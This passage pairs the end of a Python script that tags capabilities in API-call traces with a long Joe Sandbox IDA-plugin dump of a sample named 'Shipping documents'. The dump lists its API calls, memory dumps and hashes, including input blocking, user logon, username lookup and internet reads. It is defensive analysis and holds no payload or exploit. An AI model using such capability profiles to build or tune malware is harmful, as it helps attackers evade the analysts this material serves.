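    fam = ADDRESS_FAMILIES.get(arg_int(args[0]), args[0])
    typ = SOCKET_TYPES.get(arg_int(args[1]), args[1])
    proto = PROTOCOLS.get(arg_int(args[2]), args[2])
    return f"socket({fam}, {typ}, {proto})"


def classify(entry):
    """Map one parsed entry to capability tags. Per-call rules decode constants;
    set rules fire on the combination of APIs the function uses."""
    names = {api for api, _, _, _ in entry}
    tags = []
    for api, _, args, _ in entry:
        if api == "socket" and len(args) >= 3:
            tags.append("network: " + describe_socket(args))
        if api == "GetClipboardData" and args:
            tags.append("clipboard read: " + CLIPBOARD_FORMATS.get(arg_int(args[0]), args[0]))
    if {"FindFirstFileW", "FindNextFileW"} <= names:
        tags.append("file enumeration (directory walk)")
    if "InternetReadFile" in names:
        tags.append("WinINet response read (InternetReadFile)")
    if {"GetForegroundWindow", "IsIconic"} <= names:
        tags.append("window-state check (foreground / minimised)")
    return tags


def summarize(text):
    """Return [(ref of first call, tags)] for every entry with at least one tag."""
    out = []
    for entry in parse_entries(text):
        tags = classify(entry)
        if entry and tags:
            out.append((entry[0][3], tags))
    return out


if __name__ == "__main__":
    for ref, tags in summarize(TRACE):
        print(ref, "->", "; ".join(tags))
```

The subcall lines are excluded on purpose: the report nests them under the caller, and counting them would attribute a callee's GetLastError or inet_addr to every function that reaches it. Unknown constants fall through as raw hex rather than being guessed.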
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 901099227-0
                                                                                                          • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                          • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                          APIs
                                                                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2346855178-0
                                                                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                          APIs
                                                                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockInput
                                                                                                          • String ID:
                                                                                                          • API String ID: 3456056419-0
                                                                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                          APIs
                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2645101109-0
                                                                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: N@
                                                                                                          • API String ID: 0-1509896676
                                                                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 4040870279-2373415609
                                                                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 69173610-0
